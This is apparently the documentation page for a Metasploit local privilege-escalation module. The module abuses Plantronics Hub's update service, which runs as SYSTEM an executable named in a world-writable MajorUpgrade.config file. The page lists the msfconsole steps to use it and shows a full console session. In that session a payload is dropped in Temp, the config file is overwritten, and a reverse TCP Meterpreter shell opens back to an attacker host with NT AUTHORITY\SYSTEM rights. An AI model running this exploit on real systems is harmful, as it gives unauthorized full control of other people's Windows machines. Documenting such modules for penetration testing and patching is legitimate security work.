Brendan Coles
2.2 KiB
2.2 KiB
Description
The Plantronics Hub client application for Windows makes use of an
automatic update service SpokesUpdateService.exe which automatically
executes a file specified in the MajorUpgrade.config configuration
file as SYSTEM. The configuration file is writable by all users by default.
Vulnerable Application
This module has been tested successfully on Plantronics Hub version 3.13.2 on Windows 7 SP1 (x64).
Verification Steps
- Start
msfconsole - Get a session
use exploit/windows/local/plantronics_hub_spokesupdateservice_privescset SESSION <SESSION>checkrun- You should get a new SYSTEM session
Options
SESSION
Which session to use, which can be viewed with sessions
WritableDir
A writable directory file system path. (default: %TEMP%)
Scenarios
Windows 7 SP1 (x64)
msf5 > use exploit/windows/local/plantronics_hub_spokesupdateservice_privesc
msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > set session 1
session => 1
msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > set verbose true
verbose => true
msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > check
[*] The service is running, but could not be validated.
msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > run
[*] Started reverse TCP handler on 172.16.191.165:4444
[*] Writing payload to C:\Users\test\AppData\Local\Temp\MuVtxrl9.exe ...
[*] Writing configuration file to C:\ProgramData\Plantronics\Spokes3G\MajorUpgrade.config ...
[*] Sending stage (180291 bytes) to 172.16.191.242
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.242:49431) at 2020-01-03 14:55:46 -0500
[-] Failed to delete C:\Users\test\AppData\Local\Temp\MuVtxrl9.exe: stdapi_fs_delete_file: Operation failed: Access is denied.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >